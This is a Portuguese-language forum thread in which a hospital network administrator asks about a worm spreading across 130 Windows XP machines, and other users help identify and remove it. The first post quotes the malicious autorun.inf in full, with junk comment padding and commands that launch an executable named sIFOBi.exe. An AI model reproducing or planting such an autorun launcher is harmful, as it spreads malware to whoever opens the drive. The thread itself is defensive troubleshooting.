Virus na rede interna [RESOLVIDO]

1. Virus na rede interna [RESOLVIDO]

Edmar Wantuil
wantuiliv

(usa Ubuntu)

Enviado em 30/10/2010 - 12:54h

Caros amigos eu cuido de uma rede de 130 maquinas, onde tem um virus q tomou conta de todas, estava cuidado para achar a origem do virus e achei um autorun no servidor que diz assim:
aUToRuN]
;20G91N6F2K7163H8HK7G6T4UHU5NP871994PJG121H8J9I03392W69YJ35228YKR9YA3994O3900
;8Y82QN1S100E30WNR9154AV38KX9WRI93F4W03N82PXI79SLAPFI3LF3G222U2W7B1V8FURU9X931
;FKQ5210L93MGE5K1M4UNO838S8U2F2311DV7907I19RSTRR9U0638F97Z8031TK5OZPS641R
;TEEZS73A876735F981U2U4J939NSLKDF
;45F27A231FC4BAE1D863005E0B3CBED88EFC0F9DB727D2C7BFC81571
SheLl\oPEn\comMAnD=sIFObi.ExE
;QS20Q0YO02K5B521F9XQF2363B4LRV4RNPFMX2F5YR1GS6K9
;24X7
;A5YPU78KN89Y434S39O0B57RNXF099R3M5S
SHEll\opeN\DefAulT=1
OpEN=sIFOBi.EXe
;LM2

Alguem sabe oque quer dizer? ou me orientar na melhor forma como agir.


  


2. Re: Virus na rede interna [RESOLVIDO]

Edmar Wantuil
wantuiliv

(usa Ubuntu)

Enviado em 30/10/2010 - 13:00h

Esquecendo de fala o servidor para a conexão externa é madriva porem o dns é windows server 2003, e é no windows q encrontei isso. e infelizmente todas as 130 maquinas usão windows xp.


3. live cd

Perfil removido
removido

(usa Nenhuma)

Enviado em 30/10/2010 - 20:50h

Uma vez aconteceu algo parecido comigo. Mas o virus em questão era diferente. O que fiz foi tirar todos os cabos de rede, desabilitar a restauração do windows, dei boot pelo live cd do Slax que baixei com alguns módulos específicos, como por exemplo o antivirus avast. Com isso deletei os virus e os autoruns. No meu caso resolveu. Mas o meu problema era que o vírus so ficava nos hd´s externos compartilhados em rede. Ele ocultava as pastas/arquivos e criava atalhos com o mesmo nome apontando para o virus.


4. Re: Virus na rede interna [RESOLVIDO]

Rafael Umbelino
tlaloc

(usa Gentoo)

Enviado em 30/10/2010 - 21:06h

Bom, você pode fazer o seguinte...
derrube TODA a rede e o servidor DNS também.

Depois disso, saia caçando em todos os micros o seguinte arquivo:

sIFOBi.EXe

Basta excluí-lo.
Todas as linhas começando com ; são comentários.

Sobra isso:
SheLl\oPEn\comMAnD=sIFObi.ExE
SHEll\opeN\DefAulT=1
OpEN=sIFOBi.EXe

Excluindo este arquivo você livra sua rede do vírus.
Atenção: guarde uma cópia do arquivo e envie para a empresa do seu antivírus.


5. Re: Virus na rede interna [RESOLVIDO]

Edmar Wantuil
wantuiliv

(usa Ubuntu)

Enviado em 30/10/2010 - 21:16h

Caros amigos ja pensei em desabilitar kd pc da rede para poder fazer a manutenção. porem essa rede se trata de um hospital em tão infelizmente n posso me da ao luxo de derrubar todas as maquinas. pois o banco de dados é acesado 24 horas por dia. To procurando o arquivo em cada micro. e gostaria de dicas de logs para tentar descobrir o autor! muito obrigado pela atenção.


6. Re: Virus na rede interna [RESOLVIDO]

Rafael Umbelino
tlaloc

(usa Gentoo)

Enviado em 30/10/2010 - 21:22h

Cara, não tem um "autor".
Isso aí é vírus de pendrive. Vem em pendrive, cartão de memória e etc contaminado.
Quase com certeza não foi doloso.

Já que você não pode parar... bom, você tem um antivírus de servidor aí?
Um que escaneie sua rede inteira?


7. Re: Virus na rede interna [RESOLVIDO]

Edmar Wantuil
wantuiliv

(usa Ubuntu)

Enviado em 30/10/2010 - 21:27h

Amigo no servidor temos o norton e nos cliente temos o norton cliente. porém acredito que esse ja está comprometido. Estou pesando em solicitar a empresa um contrato com o panda. Pois esse está conseguindo proteger minha maquina windows, acho desnecessário dizer que o vírus não tem efeito quando linux. Gostaria muito mudar a rede toda pra linux mas não posso fazer tudo oque quero.
Boa noite


8. Re: Virus na rede interna [RESOLVIDO]

Rafael Umbelino
tlaloc

(usa Gentoo)

Enviado em 30/10/2010 - 21:36h

Panda nããão, pelamor da deusa... hahahha

Faça um contrato com a Kaspersky. Recomendo fortemente.

E veja com a Norton por quê ela não consegue resolver um simples vírus de pendrive na sua rede.


9. Re: Virus na rede interna [RESOLVIDO]

Edmar Wantuil
wantuiliv

(usa Ubuntu)

Enviado em 31/10/2010 - 00:08h

Caro amigo tambem gosto muito do kaspersky, porém infelizmente o nosso sistema é muito delicado, cai muito facil. O antigo administrador da rede me passou que o unico internet security que se adegou ao sistema foi o panda. Por isso estou pensando nele. Irei ouvir seus conselhos e enviarei um email para a turma do norton. muito obrigado pela atenção e a ajuda. Trago novas noticias em breve. O que posso dizer por em quanto é que eu renomei esse arquivo de autorun para aautorun oque fez os ataques pararem. antes ocorriam a cada 5 minutos exatos.


10. Grande Edmar

Danilo Antunes de Oliveira
aluisiogasparjr

(usa Ubuntu)

Enviado em 25/02/2012 - 03:31h

E aí manim, jóia?
Sei que isso já faz tempo, mas poderia nos dizer no que deu esse vírus aí?


11. Re: Virus na rede interna [RESOLVIDO]

Perfil removido
removido

(usa Nenhuma)

Enviado em 25/02/2012 - 03:44h

O virus não é esse autorun
o código malicioso esta nesse executável
sIFOBi.EXe , ele é um Malware.
o autorun está fazendo que o virus seja iniciado automaticamente.


12. Re: Virus na rede interna [RESOLVIDO]

Edmar Wantuil
wantuiliv

(usa Ubuntu)

Enviado em 25/02/2012 - 09:28h

Bom dia,
passamos o combofix nas maquinas e mudamos algumas permissões na rede. Mas como toda rede Windows ainda temos alguns problemas com vírus. Gostaria de colocar o kaspersky server aqui na rede mais infelizmente a empresa na achou achou viável o valor do investimento.






Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner
Linux banner
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts